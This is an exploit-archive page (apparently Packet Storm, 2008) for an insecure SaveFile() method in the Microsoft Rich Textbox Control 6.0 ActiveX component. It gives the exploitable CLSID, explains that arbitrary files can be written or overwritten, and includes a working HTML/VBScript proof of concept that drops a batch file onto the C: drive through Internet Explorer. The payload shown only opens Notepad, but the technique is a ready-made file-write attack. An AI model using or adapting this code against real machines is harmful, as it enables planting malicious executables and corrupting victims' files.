exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

msrtc-insecure.txt

msrtc-insecure.txt
Posted Jan 10, 2008
Authored by shinnai | Site shinnai.altervista.org

Microsoft Rich Textbox Control version 6.0 (SP6) SaveFile() insecure method exploit.

tags | exploit
SHA-256 | 4743e545f17d34860403b248e012043f791b8ff55f1c7cde1448c653428c1dcf

msrtc-insecure.txt

Change Mirror Download
<pre><code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method</b>
url: http://www.microsoft.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>

<b>Technical details:</b>
File: RICHTX32.OCX
ver.: 6.1.97.82

While this GUID <b>{3B7C8860-D78F-101B-B9B5-04021C009402}</b> is
killbited, this one <b><font color='green'>{B617B991-A767-4F05-99BA-AC6FCABB102E}</font></b>

works fine so it is possible, using the "SaveFile()" method,
to save the content of the rich textbox on a user's pc.
This can be used to save, overwrite and/or corrupt arbitrary
files on the system.

It's marked as:
<b>RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data</b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:B617B991-A767-4F05-99BA-AC6FCABB102E' id='test' style='width: 250px; height: 75px'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.Text = "@echo off" & vbCrLf & "cmd.exe /c notepad.exe" & vbCrLf & "echo Hello World!" & vbCrLf & "pause"
test.SaveFile "C:\shinnai.bat", 1
MsgBox "Exploit completed!"
End Sub
</script></span></span></code></pre>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close